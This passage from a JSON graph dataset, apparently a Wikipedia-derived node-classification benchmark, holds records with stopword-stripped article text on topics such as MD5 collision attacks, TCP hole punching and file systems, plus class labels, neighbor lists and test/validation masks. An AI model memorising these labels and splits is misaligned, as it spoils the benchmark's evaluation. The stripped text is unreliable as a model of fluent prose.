    "text": "Object-based_spatial_database:object-based spatial database object-based spatial database spatial database stores location objects object-based spatial model treats world surface littered recognizable objects e.g cities rivers exist independent locations objects simple polygons lines complex represent cities field-based data model sees world continuous surface features e.g elevation vary using object-based spatial database easier store additional attributes objects direction speed etc using attributes make easier answer queries like find tanks whose speed 10 km oriented north find enemy tanks certain region storing attributes objects provide better result presentation improved manipulation capabilities efficient way field-based data model information usually stored different layers harder extract different information various layers data model applied er germ model giser s.shekhar introduces direction spatial object presents solution object-direction-based queries common representations data model follow open-source software program adds support geographic objects postgresql object-relational database postgis follows simple features sql specification open geospatial consortium provides uml representation geographic applications represent concept field object provides way differentiate spatial relation simple association represents framework objects classes partitioned three kinds classes simple classes link classes path classes objects simple class one hand like objects models object type object identity attributes whose values either data type e.g integer string object type attribute may contain reference another object structure object basically tuple record hand objects simple class nodes database graph – whole database also viewed single graph objects link class like objects simple class additionally contain two distinguished references source target objects belonging simple classes makes edges database graph finally object path class like object simple class contains additionally list references node edge objects form path database graph represent data model store geographic information top eer model geis define input data model provide following data model geometry giser model geometry entity related spatial object relationship determines shape additional entities represent primitives points lines polygons proposed related models topology topology property belonging spatial object property remains unaltered even object deforms example road network two nodes network thus remain connected even path nodes changed road construction order represent topology basic primitives networks i.e. graphs partitions provided additional primitives added lines worboy model system support representation stored data oracle spatial component enterprise oracle 10g provides support stores object road top current implentend construction used network data model store geographic data nodes links graph representation node links set attributes example route object added database supports raster set vector representation",
    "neighbors": [
      8201,
      1146,
      580,
      3454
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6954,
    "label": 4,
    "text": "Collision_attack:collision attack cryptography collision attack cryptographic hash tries find two inputs producing hash value i.e hash collision contrast preimage attack specific target hash value specified roughly two types collision attacks generally mathematically stated collision attack finds two different messages m1 m2 hash m1 hash m2 classical collision attack attacker control content either message arbitrarily chosen algorithm much like symmetric-key ciphers vulnerable brute force attacks every cryptographic hash function inherently vulnerable collisions using birthday attack due birthday problem attacks much faster brute force would hash n bits broken 2 time evaluations hash function efficient attacks possible employing cryptanalysis specific hash functions collision attack discovered found faster birthday attack hash function often denounced broken nist hash function competition largely induced published collision attacks two commonly used hash functions md5 sha-1 collision attacks md5 improved much 2007 takes seconds regular computer hash collisions created way usually constant length largely unstructured directly applied attack widespread document formats protocols however workarounds possible abusing dynamic constructs present many formats way two documents would created similar possible order hash value one document would shown authority signed signature could copied file malicious document would contain two different messages document conditionally display one subtle changes file extension collision attack chosen-prefix collision attack specific merkle–damgård hash functions case attacker choose two arbitrarily different documents append different calculated values result whole documents equal hash value attack much powerful classical collision attack mathematically stated given two different prefixes p1 p2 attack finds two appendages m1 m2 hash p1 ∥ m1 hash p2 ∥ m2 ∥ concatenation operation 2007 chosen-prefix collision attack found md5 requiring roughly 2 evaluations md5 function paper also demonstrates two x.509 certificates different domain names colliding hash values means certificate authority could asked sign certificate one domain certificate specially signature could used create new rogue certificate impersonate another domain real-world collision attack published december 2008 group security researchers published forged x.509 signing certificate could used impersonate certificate authority taking advantage prefix collision attack md5 hash function meant attacker could impersonate ssl-secured website man-in-the-middle thereby subverting certificate validation built every web browser protect electronic commerce rogue certificate may revokable real authorities could also arbitrary forged expiry time even though md5 known weak 2004 certificate authorities still willing sign md5-verified certificates december 2008 least one microsoft code-signing certificate still using md5 may 2012 flame malware successfully used new variation chosen-prefix collision attack spoof code signing components microsoft root certificate still used compromised md5 algorithm 2019 researchers found chosen-prefix collision attack sha-1 computing complexity 2 2 cost less 100,000 us dollars many applications cryptographic hash functions rely collision resistance thus collision attacks affect security example hmacs vulnerable attack useful attacker must control input hash function digital signature algorithms sign large amount data efficiently implementations use hash function reduce compress amount data needs signed constant size digital signature schemes often vulnerable hash collisions unless using techniques like randomized hashing usual attack scenario goes like 2008 researchers used chosen-prefix collision attack md5 using scenario produce rogue certificate authority certificate created two versions tls public key certificate one appeared legitimate submitted signing rapidssl certificate authority second version md5 hash contained flags signal web browsers accept legitimate authority issuing arbitrary certificates 2003 denial service dos attack described used hash collisions exploit worst-case runtime hash table lookups issue affected major programming languages used weaker hash functions",
    "neighbors": [
      5764,
      517,
      7556,
      3984,
      9744,
      660,
      1941,
      3477,
      161,
      4389,
      8627,
      8628,
      2357,
      9271,
      11584,
      9170,
      212,
      6238,
      8674,
      11639,
      6905
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6955,
    "label": 3,
    "text": "Plinian_Core:plinian core plinian core set vocabulary terms used describe different aspects biological species information biological species information kinds properties traits related taxa—biological non-biological—are included thus instance terms pertaining descriptions legal aspects conservation management demographics nomenclature related resources incorporated plinian core aimed facilitate exchange information species upper taxa scope scope plinian core design requirements includes ease use self-contained able support data integration multiple databases ability handle different levels granularity core terms grouped current version follows plinian core started collaborative project instituto nacional de biodiversidad gbif spain 2005 series iterations elements defined implanted different projects resulted plinian core flat deprecated result new development impulse overcome 2012 new formal requirements additional input better support standard documentation well align processes tdwg world reference body biodiversity information standards new version plinian core v3.x.x defined provides flexibility fully represent information species variety scenarios new elements deal aspects ipr related resources referenced etc introduced elements already included better-defined documented partner development plinian core new phase incorporated university granada ug spain alexander von humboldt institute iavh colombia national commission knowledge use biodiversity conabio mexico university são paulo usp brazil plinian core task group within tdwg interest group species information constituted currently working development plinian core presented levels abstract model application profiles abstract model comprising abstract model schema xsd terms uris normative part comprehensive allows different levels granularity describing species properties taken menu choose terms level detail needed specific project subsets abstract model intended implemented specific projects application profiles aps besides containing part elements aps impose additional specifications included elements controlled vocabularies examples aps use follow plinian incorporates number elements already defined standards following table summarizes standards elements used plinian core",
    "neighbors": [
      9669
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6956,
    "label": 3,
    "text": "Darwin_4078:darwin 4078 game takes place within gigantic spaceship virtually infinite capacity ability manipulate time space player must deal enigmatic creatures called evol consist pure energy need keep capsules order maintain existence world characters game designed resemble microscopic organisms appearance quick tricky movements player ship undergoes 10 types transformations throughout game offensive defensive maneuvers specific design sound effects used minimal different types sounds used according type shots speed sound resembling long scream results player ship hit returns weakest evolutionary state game designer graphic designer music composer tomo furukawa would go become vocalist band guniw tools player must progress 16 different levels defeating boss end level player controls ship using 8-way joystick 2 buttons one button targets enemies air targets enemies ground power player ship increases evolves two broad categories define enemies attack first type shoots forward direction constant speed second type shoots bullets travel different speeds depending distance player ship bullets travel quicker player farther away slower player close made staying away enemies would necessarily make easier avoid attacks game difficulty also change time enemies become stronger player ship evolves style continued game sequel player reaches 2,000,000 points gain bonus 2,000,000 points bonus 3,000,000 points reach 3,000,000 points bonus system allows player reach 10,000,000 points gaining 5,000,000 points game counter display digits ten millions destroying 16 ground enemies row desert level extends gameplay without insert additional credits biggest characteristic game evolution player ship ship starts form called beas evolves player collects evol capsules appear certain enemies killed player ship grows size strength evolves certain forms may difficult use effectively player must pace evolution properly order succeed 19 different evolutionary forms total ship attacks target airborne enemies gradually increase strength ship evolves attacks enemies ground improved way hitting airborne enemies certain number shots causes get knocked player ship dock enemies short period time knocked ship attacks enemies ground increase strength period however ground enemies killed power-up power-ups exist attacks enemies ground giant version zanzō knocked player use improve ground attack players must collect evol capsules frequently order advance strongest evolutionary forms failing collect capsules certain period time causes ship gradually devolve one level time however devolution timer stopped ship docked enemy character explained player ship devolves weakest form pister one rank beas hit enemy attack apply ship black deame suppurate forms farther ship evolutionary chain gets hit longer animation ship devolve though coming contact enemies normally results instant loss ship invincible devolution animation lasts player may kill enemies ramming player loses ship hit enemy attack weakest evolutionary form pister crash enemy ship devolving several evolutionary forms achieved gathering capsules mutation occurs player hit enemy attack certain evolutionary stage devolve time certain evolutionary stage ship attacks become highly stylized powerful used effectively reverse evolution another special form occurs player hit enemy attack specific set normal evolutions reverse evolutionary form black deame bat-like bears completely different appearance forms ship unaffected enemy attacks packs extraordinary amount firepower shoots numerous smaller versions main attack however player fails collect evol capsule allotted period time ship immediately devolves weakest form making transformation double-edged sword impossible maintain black deame form throughout game docking enemies since attack power powerful enemies die instantly rather knocked darwin 4078 ported 2nd generation msx 1987 hudson soft bore similar appearance arcade game b-wings nes game hector '87 sequel titled also written s.r.d released data east 1987 ported sega april 8 1990 sega mega drive darwin 4081 direct sequel game bears similarities darwin side-scrolling action game developed data east uses evolution system darwin 4081 numbered 4081 4th game used evolution system darwin 4078 s.r.d 4079 act-fancer 4080 similar games include bio-ship paladin upl bermuda triangle snk also feature ships change appearance power-ups",
    "neighbors": [
      1776,
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 6957,
    "label": 3,
    "text": "MCST-R500S:mcst-r500s mcst r500s 32-bit system-on-a-chip developed moscow center sparc technologies mcst fabricated tsmc",
    "neighbors": [
      4386,
      6659,
      7234,
      9861,
      2503,
      7687,
      5358,
      1776,
      1425,
      499,
      1399,
      2490,
      2523,
      11580,
      9309
    ],
    "mask": "None"
  },
  {
    "node_id": 6958,
    "label": 9,
    "text": "SenseTalk:sensetalk sensetalk english-like scripting language derived hypertalk language used hypercard sensetalk originally developed scripting language within hypersense multimedia authoring application nextstep openstep platforms sensetalk resurfaced 2002 scripting language eggplant first commercial mac os x cross-platform gui testing application sensetalk english-like scripting language xtalk family derived hypertalk advanced programming language extensions number features distinguish sensetalk xtalk languages one inclusion lists property lists first class data structures another inclusion objects sensetalk treats script property list object encapsulating properties behaviors sensetalk include concept object classes instead treats every object equally object inherit behavior object objects multiple inheritance supported",
    "neighbors": [
      9185,
      4486,
      7307,
      4844,
      7983,
      9780,
      4571
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6959,
    "label": 1,
    "text": "Data_event:data event data event relevant state transition defined event schema typically event schemata described pre- post condition single set data items contrast eca event condition action considers event signal data event refers change signal describes specific state transitions referred eca conditions considering data events relevant data item state transitions allows defining complex event-reaction schemata database defining data event schemata relational databases limited attribute instance events object-oriented databases also support collection properties allows defining changes collections data events",
    "neighbors": [
      6784,
      5850,
      9286
    ],
    "mask": "Test"
  },
  {
    "node_id": 6960,
    "label": 0,
    "text": "Shlomo_Argamon:shlomo argamon shlomo argamon american/israeli computer scientist forensic linguist currently tenured professor computer science director master data science program illinois institute technology chicago il shlomo argamon received b.s applied mathematics carnegie-mellon university m.phil ph.d. computer science yale university supervised drew mcdermott spent two years postdoctoral research fulbright foundation fellowship sarit kraus bar-ilan university ramat gan israel since late 1990s argamon worked primarily computational linguistic analysis non-denotational meaning including computational analysis language stylistics sentiment analysis metaphor analysis also published well-cited research active learning machine learning metalearning robotic mapping argamon best known work computational stylistics particularly author profiling together moshe koppel others shown statistical analysis word usage determine author age sex native language personality type high accuracy english-language texts work also shown textual features indicating differences male female authorship consistent languages across time also developed computational stylistic methods provide insights meaning stylistic differences one argamon key innovations purpose development computational stylistic analysis using systemic functional linguistics example together jeff dodick paul chase examined whether clear consistent differences scientific method experimental sciences historical sciences work showed using systemic functional features computational stylistic analysis provides evidence multiple scientific methodologies sorts posited previously philosophers science recently argamon pushed increased use linguistic analysis attribution cybersecurity attacks pointed linguistic attribution techniques often used good effect natural language texts arise different attack scenarios provided analyses high-profile cases sony pictures hack democratic national committee cyber attacks shadow brokers nsa leak 2013 argamon founded illinois institute technology master data science program currently directs program seeks teach students think real problems need solved simply find technical solutions argamon views data scientists sensemakers whose job merely produce analytic results help clients make sense complex uncertain fast-changing world rigorous analysis explanation data",
    "neighbors": [
      8288,
      1890
    ],
    "mask": "None"
  },
  {
    "node_id": 6961,
    "label": 6,
    "text": "Fusion-io_NVMFS:fusion-io nvmfs sandisk/fusion-io nvmfs file system formerly known direct file system dfs accesses flash memory via virtual flash storage layer instead using traditional block layer api file system two main novel features first lays files directly large virtual storage address space second leverages virtual flash storage layer perform block allocations atomic updates result nvmfs performs better much simpler traditional unix file system similar functionalities additionally approach avoids log-on-log performance issues triggered log-structured file systems microbenchmark results show nvmfs deliver 94,000 i/o operations per second iops direct reads 71,000 iops direct writes virtualized flash storage layer top first-generation fusion-io iodrive direct access performance nvmfs consistently better ext3 platform sometimes 20 buffered access performance nvmfs also consistently better ext3 sometimes 149 application benchmarks show nvmfs outperforms ext3 7 250 requiring less cpu power additionally i/o latency lower nvmfs compared ext3 api used nvmfs access flash memory consists layer provides api called virtualized flash storage layer dfs paper responsibility layer perform block allocation wear leveling garbage collection crash recovery address translation also make address translation data structures persistent",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      5661,
      9249,
      9762,
      5158,
      7225,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      2304,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555
    ],
    "mask": "Test"
  },
  {
    "node_id": 6962,
    "label": 9,
    "text": "Gretl:gretl gretl open-source statistical package mainly econometrics name acronym g nu r egression e conometrics ime-series l ibrary graphical user interface gui command-line interface written c uses gtk+ widget toolkit creating gui calls gnuplot generating graphs native scripting language gretl known hansl see also used together tramo/seats r stata python octave ox julia gretl output models latex files besides english gretl also available albanian basque bulgarian catalan chinese czech french galician german greek italian polish portuguese varieties romanian russian spanish turkish ukrainian gretl reviewed several times journal applied econometrics recently australian economic review review also appeared journal statistical software 2008 since journal featured several articles gretl used implement various statistical techniques gretl offers fully documented xml-based data format also import ascii csv databank eviews excel gnumeric gnu octave jmulti opendocument spreadsheets pcgive rats 4 sas xport spss stata files export stata gnu octave r csv jmulti pcgive file formats gretl scripting language called hansl recursive acronym hansl neat scripting language hansl turing-complete interpreted programming language featuring loops conditionals user-defined functions complex data structures considered domain-specific language econometrics like scientifically oriented programming languages matlab julia matrices supported natively primitive variable type gretl add-ons known function packages written hansl simple example hansl running code produces random number generation rng gretl examined tested yalta schreiber 2012 authors conclude results show rng related procedures gretl implemented soundly perform well three crush test suites testu01 due libre nature breadth econometric techniques contains gretl widely used teaching econometrics undergraduate level onwards datasets gretl format available several popular textbooks following list textbooks use gretl software choice addition free supplement hill griffiths lim principles econometrics wiley available",
    "neighbors": [
      2050,
      2180,
      7301,
      11654,
      5129,
      7945,
      3980,
      2317,
      4493,
      15,
      6797,
      7950,
      8079,
      1939,
      2457,
      5148,
      7580,
      7326,
      802,
      3618,
      7341,
      9133,
      7983,
      5555,
      9780,
      9148,
      6718,
      10687,
      2242,
      5830,
      5703,
      4808,
      5833,
      5450,
      9926,
      10822,
      2000,
      8147,
      9944,
      3674,
      2010,
      2652,
      479,
      10464,
      10848,
      11239,
      4840,
      10472,
      8554,
      363,
      5612,
      5741,
      7148,
      9579,
      8304,
      1394,
      7924,
      8436,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6963,
    "label": 6,
    "text": "AtheOS_File_System:atheos file system atheos file system afs originally used atheos operating system mbr partition id 0x2a part syllable syllable-based wave os operating system afs started exactly data structures file system bfs extended feature set many ways afs 64-bit journaled file system support file attributes file indexing soft deletions also partially supported",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      10851,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      1801,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6964,
    "label": 4,
    "text": "TCP_hole_punching:tcp hole punching tcp nat traversal tcp hole punching sometimes nat punch-through occurs two hosts behind network address translation nat trying connect outbound tcp connections scenario particularly important case peer-to-peer communications voice-over-ip voip file sharing teleconferencing chat systems similar applications tcp hole punching experimental used nat traversal technique establishing tcp connection two peers behind nat device internet computer network nat traversal general term techniques establish maintain tcp/ip network and/or tcp connections traversing nat gateways following terms host client peer used almost interchangeably nat traversal tcp hole punching establishes bidirectional tcp connections internet hosts private networks using nat work types nats behavior standardized two hosts connecting tcp via outbound connections simultaneous tcp open case tcp state machine diagram availability tcp hole punching depends type computer port allocation used nat two peers behind nat connect via need know little bit one thing absolutely need know location peer remote endpoint remote endpoint data ip address port peer connect two peers b initiate tcp connections binding local ports pa pb respectively need know remote endpoint port mapped nat make connection peers behind nat discover public remote endpoint peer problem called nat port prediction tcp nat traversal hole punching techniques solve port prediction problem nat port allocation one two depending whether nats exhibit predictable non-predictable behavior possible perform tcp connection via tcp simultaneous open shown connection matrix representing different cases impact end-to-end communication methods used nats allow peers perform port prediction remote peer information one mapping guess value subsequent mappings tcp connection happen two steps first peers make connection third party learn mapping second step peers guess nat port mapping subsequent connections solves port prediction method requires making least two consecutive connections peer require use third party method work properly case carrier-grade nat lot subscribers behind ip addresses limited amount ports available allocating consecutive ports internal host might impractical impossible case port prediction trivial peers simply exchange port bound another communication channel udp dht making outbound connections tcp simultaneous open method requires one connection per peer require third party perform port prediction solution peers first connect third party server save port mapping value give peers port mapping value peer second step peers reuse local endpoint perform tcp simultaneous open unfortunately requires use so_reuseaddr tcp sockets use violates tcp standard lead data corruption used application protect data corruption assume port prediction already taken place one methods outlined peer knows remote peer endpoint peers make posix connect call peer endpoint tcp simultaneous open happen follows tcp simultaneous open work nat enough guarantee nats behave nicely respect tcp simultaneous open technique described works fine within cgn cgn also make use port overloading behavior means distinct internal endpoints port value mapped public endpoint break uniqueness quintuple result acceptable tcp port preservation also lead cases cgn ports overloaded issue protocol soundness port overloading tcp allows cgn fit hosts internally preserving tcp end-to-end communication guarantees",
    "neighbors": [
      8640,
      3011,
      10924,
      6541,
      14,
      3792,
      4435,
      8308,
      3770
    ],
    "mask": "None"
  },
  {
    "node_id": 6965,
    "label": 9,
    "text": "Semantic_dictionary_encoding:semantic dictionary encoding semantic dictionary encoding sde preserves full semantic context source programs adding information used accelerating speed code generation sde forms code-generating loader form bytecode combined jit compiler code generation load time elementary form dictionary entries represent nodes directed acyclic graph dag describes actions program abstract syntax tree ast tabular form uses intermediate representation ir based encoded abstract syntax tree symbol table program",
    "neighbors": [
      8609,
      10703
    ],
    "mask": "Test"
  },
  {
    "node_id": 6966,
    "label": 2,
    "text": "OpenPlay:openplay openplay name open-source cross-platform networking library created apple inc. openplay compiles runs classic mac os macos windows linux operating systems openplay high-level networking solution game applications known abstraction game player top automatically managed networking core version 2.0 includes netsprockets api mac os 9 netsprockets subset apple obsolete game sprockets",
    "neighbors": [
      576,
      2921,
      6797,
      7983,
      823,
      2685,
      3167
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6967,
    "label": 9,
    "text": "Jacob_T._Schwartz:jacob t. schwartz jacob theodore jack schwartz january 9 1930 – march 2 2009 american mathematician computer scientist professor computer science new york university courant institute mathematical sciences designer setl programming language started nyu ultracomputer project founded new york university department computer science chairing 1964 1980 schwartz born bronx new york january 9 1930 ignatz hedwig schwartz attended stuyvesant high school went city college new york received b.s 1949 city college new york m.a 1949 ph.d. 1951 yale university research interests included theory linear operators von neumann algebras quantum field theory time-sharing parallel computing programming language design implementation robotics set-theoretic approaches computational logic proof program verification systems multimedia authoring tools experimental studies visual perception multimedia high-level software techniques analysis visualization bioinformatic data authored 18 books 100 papers technical reports also inventor artspeak programming language historically ran mainframes produced graphical output using single-color graphical plotter served chairman computer science department founded courant institute mathematical sciences new york university 1969 1977 also served chairman computer science board national research council former chairman national science foundation advisory committee information robotics intelligent systems 1986 1989 director darpa information science technology office darpa/isto arlington virginia jacob schwartz two daughters abby schwartz living new york city rachel fainman stage name rachel kane living winnipeg canada jack also two grandchildren adrienne fainman adam fainman",
    "neighbors": [
      4930,
      11075,
      8262,
      11497,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 6968,
    "label": 2,
    "text": "Kernel_same-page_merging:kernel same-page merging computing kernel same-page merging abbreviated ksm also known kernel shared memory memory merging kernel feature makes possible hypervisor system share identical memory pages amongst different processes virtualized guests directly linked kernel-based virtual machine kvm use ksm merge memory pages occupied virtual machines ksm performs memory sharing scanning main memory finding duplicate pages detected duplicate pair merged single page mapped original locations page also marked copy-on-write cow kernel automatically separate one process modify data ksm originally intended run virtual machines one host sharing memory processes well virtual machines upon implementation different users found ksm also useful non-virtualized environments memory premium experimental implementation ksm red hat found 52 virtual instances windows xp 1 gb memory could run host computer 16 gb ram ksm merged linux kernel mainline kernel version 2.6.32 released december 3 2009 effective operating system kernel must find identical memory pages held different processes kernel also needs decide whether pages going update infrequently enough merging would efficient use processor resources concern although memory usage reduced cpu usage increased thus negating potential increases performance security also concern",
    "neighbors": [
      5120,
      4616,
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      5176,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      8273,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      5363,
      2294,
      8439,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      10016,
      295,
      823,
      7992,
      318,
      3911,
      4423,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      7601,
      1972,
      9660,
      9667,
      457,
      5067,
      8147,
      8671,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 6969,
    "label": 9,
    "text": "CMU_Common_Lisp:cmu common lisp cmucl free common lisp implementation originally developed carnegie mellon university cmucl runs unix-like platforms including linux bsd experimental windows port well steel bank common lisp derived cmucl scieneer common lisp commercial derivative cmucl earliest implementation predates common lisp part spice lisp around 1980 1985 rob maclachlan started re-writing compiler would become python compiler cmucl ported unix workstations ibm pc rt mips sparc early cmucl releases support intel x86 architecture due lack registers cmucl strictly separated type-tagged immediate data types garbage collector would rely knowing one half cpu registers could hold tagged types half untagged types leave enough registers python backend cmu canceled project favor dylan implementation using cmucl compiler base maintenance taken group volunteers 1996 group making regular releases infrastructure around time port intel x86 architecture completed first running freebsd later linux problem lacking registers solved new conservative garbage collector new garbage collector accepts value type registers treats anything might pointer pointer purpose collecting moving target",
    "neighbors": [
      10752,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      4122,
      8226,
      2105,
      6201,
      6717,
      8258,
      8771,
      1613,
      9299,
      3675,
      7267,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      9865,
      6797,
      9875,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      8908,
      205,
      7896,
      10463,
      7392,
      7904,
      11488,
      5360,
      5361,
      8435,
      6906,
      2304,
      4865,
      3334,
      6919,
      1301,
      5397,
      10012,
      3869,
      2335,
      7983,
      10547,
      823,
      311,
      6969,
      11083,
      1365,
      3413,
      2392,
      6493,
      10083,
      6502,
      8554,
      5492,
      3446,
      4992,
      2438,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      9128,
      9151,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      5612,
      11255,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 6970,
    "label": 6,
    "text": "Self-certifying_File_System:self-certifying file system computing self-certifying file system sfs global decentralized distributed file system unix-like operating systems also providing transparent encryption communications well authentication aims universal distributed file system providing uniform access available server however usefulness sfs limited low deployment sfs clients developed june 2000 doctoral thesis david mazières sfs client daemon implements sun network file system nfs protocol communicating operating system thus work operating system supports nfs including windows client manages connections remote file systems necessary acting kind protocol translation layer sfs server works similarly distributed file system servers exposing existing disk file system network specific sfs protocol unix-like systems sfs file systems usually found /sfs/hostname hostid sfs file system first accessed path connection server made directory created automounted primary motivation behind file system address shortcomings hardwired administratively configured distributed file systems larger organizations various remote file transfer protocols designed operate securely separate administrative realms example sfs one could store files single remote server access files securely transparently location stored locally without special privileges administrative cooperation running sfs client daemon available file systems found path regardless physical location implicitly authenticated path names — include public-key fingerprint server hence called self-certifying addition new perspective sfs also addresses commonly raised limitations distributed file systems example nfs smb clients rely server file system security policies nfs servers rely client computer authentication often complicates security one compromised computer could breach security entire organization nfs smb protocols also provide confidentiality encryption tamper resistance computers network without encapsulation layers ipsec unlike coda afs sfs provide local caching remote files thus dependent network reliability latency bandwidth",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      3629,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      3742,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      5397,
      6935,
      11033,
      287,
      1825,
      6434,
      2339,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      5433,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      4490,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      8628,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 6971,
    "label": 3,
    "text": "ZiiLABS:ziilabs ziilabs global technology company producing line media-oriented application processors reference platforms enabling software series platforms named zms designed create products target range low-power consumer electronics embedded devices including android-based phones tablets ziilabs founded 1994 3dlabs became wholly owned subsidiary creative technology ltd 2002 january 2009 company re-branded ziilabs re-branding reflected 3dlabs focus supplying low-power media-rich application processors hardware platforms middleware rather 3d gpus previously case company announced first applications/media processor dms-02 2005 followed zms-05 zms-08 recently zms-20 zms-40 zms processors combine ziilabs ’ core asset stemcell computing array arm cores integrated peripheral functions create system chip soc 3dlabs company developed glint permedia gpus used personal workstation graphics cards 2002 company acquired intense3d group become vertically integrated graphics board vendor supplying workstation graphics card realizm brand 3dlabs stopped developing graphics gpus cards 2006 focus media processor business november 2012 creative technology limited announced entered agreement intel corporation intel license certain technology patents ziilabs inc. ltd acquire certain engineering resources assets related uk branch part 50 million deal ziilabs still wholly owned creative continues retain ownership stemcell media processor technologies patents continue supply support zms series chips customers company products include range arm-based zms processors feature so-called stemcell media processing architecture plus portfolio tablet reference platforms based in-house android board support package application software recent platform jaguar android reference tablet announced may 2011 core asset ziilabs zms chips seem array processing units called stemcells programmed perform media processing described 32-bit floating-point processing units likely form digital signal processor cores used accelerate various operations video codec 3d graphics handling zms processors handled programming array coprocessors job years number development platforms made introduced including zii development kits traditional large form factor systems",
    "neighbors": [
      7170,
      4622,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      1085,
      8253,
      7745,
      7747,
      9799,
      6730,
      2635,
      7755,
      4699,
      8795,
      99,
      8812,
      10359,
      10360,
      10361,
      10363,
      638,
      10369,
      10371,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      704,
      10945,
      4821,
      3294,
      2788,
      3301,
      9959,
      9964,
      6391,
      3835,
      2814,
      6911,
      781,
      6415,
      5417,
      2862,
      7988,
      11062,
      2368,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      8561,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      1972,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      499,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6972,
    "label": 2,
